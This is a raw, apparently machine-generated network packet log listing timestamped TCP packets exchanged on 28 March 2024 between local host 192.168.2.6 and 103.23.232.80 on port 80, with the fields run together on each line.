                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537755013 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537786961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537800074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537821054 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537823915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537858963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537878990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537903070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537940979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537970066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537977934 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537985086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.537998915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538009882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538036108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538044930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538058043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538098097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538103104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538116932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538166046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538203955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538206100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538220882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538242102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538268089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538281918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538304090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538310051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538343906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538352966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538371086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538410902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538424015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538446903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538448095 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538489103 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538512945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538527012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538539886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538548946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538558960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538577080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538594961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538606882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538628101 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538645983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538682938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538710117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538723946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538747072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538760900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538783073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538810015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538825035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538861990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538868904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538873911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538887978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538934946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538963079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.538992882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539005995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539027929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539057016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539062023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539062023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539072037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539115906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539134026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539146900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539189100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539191008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539216042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539259911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539283991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539298058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539309978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539324045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539335012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539357901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539366961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539371014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539396048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539412975 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539422035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539436102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539469957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539490938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539504051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539526939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539527893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539552927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539562941 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539566040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539589882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539616108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539625883 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539653063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539664030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539681911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539726019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539756060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539762020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539771080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539793968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539798021 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539829016 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539855003 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539866924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539880037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539900064 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539925098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539937973 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539961100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539963961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.539995909 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540009022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540034056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540091038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540105104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540117979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540127039 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540146112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540157080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540170908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540179014 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540206909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540311098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540345907 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540363073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540375948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540390015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540401936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540401936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540427923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540437937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540462017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540473938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540503025 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540533066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540570974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540577888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540591955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540605068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540611982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540628910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540638924 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540657997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540690899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540726900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540766001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540779114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540802956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540802002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540837049 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540847063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540859938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540883064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540919065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540931940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540946007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540966988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.540970087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541004896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541007996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541053057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541069984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541099072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541106939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541114092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541129112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541136026 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541167021 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541183949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541198015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541228056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541254044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541266918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541290045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541307926 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541335106 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541348934 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541383982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541409016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541420937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541444063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541445017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541459084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541479111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541517019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541529894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541543961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541557074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541575909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541578054 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541589975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541604042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541641951 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541666031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541690111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541701078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541703939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541728020 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541764021 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541776896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541801929 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541815996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541829109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541842937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541866064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541877985 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541894913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541903973 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541910887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541954994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541966915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541980982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.541990995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542021036 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542031050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542045116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542057037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542068005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542071104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542094946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542105913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542133093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542140961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542201996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542242050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542254925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542280912 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542299986 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542316914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542329073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542365074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542391062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542416096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542429924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542443037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542468071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542485952 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542505980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542520046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542532921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542556047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542566061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542589903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542609930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542629957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542654991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542668104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542690992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542706966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542716980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542732000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542757034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542763948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542831898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542845011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542857885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542871952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542881012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542885065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542897940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542907953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542912960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542924881 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542949915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542956114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.542975903 CET8049718103.23.232.80192.168.2.6
